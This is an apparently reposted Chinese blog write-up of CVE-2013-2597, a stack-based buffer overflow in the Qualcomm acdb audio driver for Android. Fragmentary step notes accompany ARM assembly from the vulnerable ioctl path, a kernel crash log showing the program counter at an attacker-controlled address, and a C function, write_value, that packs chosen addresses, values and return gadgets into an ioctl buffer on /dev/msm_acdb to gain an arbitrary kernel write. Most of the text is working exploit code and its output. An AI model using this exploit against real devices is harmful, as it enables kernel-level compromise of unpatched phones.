Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)
时间:2022-03-10 17:49
do_vfs_ioctl:
STMPW [SP], { R4-R9, LR }
...
BL acdb_ioctl
...
ADD SP, SP, #$44 // (2)
LDMUW [SP], { R4-R9, PC } // (1)
2.acdb_ioctl其中一段,可以获得控制PC的机会。修改寄存器的位置是 (3),这里可以操作R4-PC的所有数值了
ADD SP, SP, #$24 // (6) LDMUW [SP], { R4-R9, PC }
5.实际栈的位置和p->data的位置需要硬编码适配。
ACDB=> ACDB ioctl not found! Unable to handle kernel paging request at virtual address 9f9e9d9c pgd = df56c000 [9f9e9d9c] *pgd=00000000 Internal error: Oops: 80000005 [#1] preEMPT SMP Modules linked in: CPU: 1 Tainted: G W (3.0.8+1.0.21100-02148-g79e6d0e #1) PC is at 0x9f9e9d9c LR is at acdb_ioctl+0x740/0x860
static int write_value(const acdb_param *param, unsigned long address, unsigned long value) { const char *device_name = "/dev/msm_acdb"; struct acdb_ioctl arg; int fd; int ret; int i; fd = open(device_name, O_RDONLY); if (fd < 0) { ALOGI("failed to open %s due to %s.\n", device_name, strerror(errno)); return -1; } arg.size = param->pc2.pos + 4; for (i = 0; i < arg.size; i += 4) { *(unsigned long int *)&arg.data[i] = i; } *(unsigned long int *)&arg.data[param->address_pos] = address; // R9<span style="white-space:pre"> </span> *(unsigned long int *)&arg.data[param->value_pos] = value; // R5 *(unsigned long int *)&arg.data[param->pc1.pos] = param->pc1.value; // *(unsigned long int *)&arg.data[param->pc2.pos] = param->pc2.value; // ret = ioctl(fd, 9999, &arg); // 随意触发一个ioctl,造成堆栈溢出,使得任意地址写入漏洞的触发 close(fd); return 0; }
参考文章:
Stack-based buffer overflow in acdb audio driver (CVE-2013-2597),布布扣,bubuko.com